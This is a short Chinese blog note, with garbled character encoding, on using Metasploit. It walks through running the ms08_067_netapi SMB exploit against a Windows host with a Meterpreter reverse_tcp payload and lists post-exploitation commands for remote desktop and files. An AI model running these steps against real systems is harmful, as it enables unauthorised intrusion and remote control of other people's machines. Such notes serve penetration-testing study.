msfconsole


Exploit 模塊 --》漏洞利用

payloads ?--》shellcode ?漏洞利用后執(zhí)行的代碼

use exploit --》選擇漏洞利用模塊

1.msfconsole 啟動

2.use exploit/windows/smb/ms08_067_netapi 使用漏洞

3.show options ?查看需要填寫的參數(shù) set RHOST 192.168.1.2

4.set payload windows/meterpreter/reverse_tcp 執(zhí)行代碼

5.show options ? set LHOST 192.168.1.4

6.執(zhí)行


遠程桌面:run vnc

文件管理:download wdit cat mkdir mv updsate rm rmdir

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
【社區(qū)內容提示】社區(qū)部分內容疑似由AI輔助生成,瀏覽時請結合常識與多方信息審慎甄別。
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發(fā)布,文章內容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關閱讀更多精彩內容

友情鏈接更多精彩內容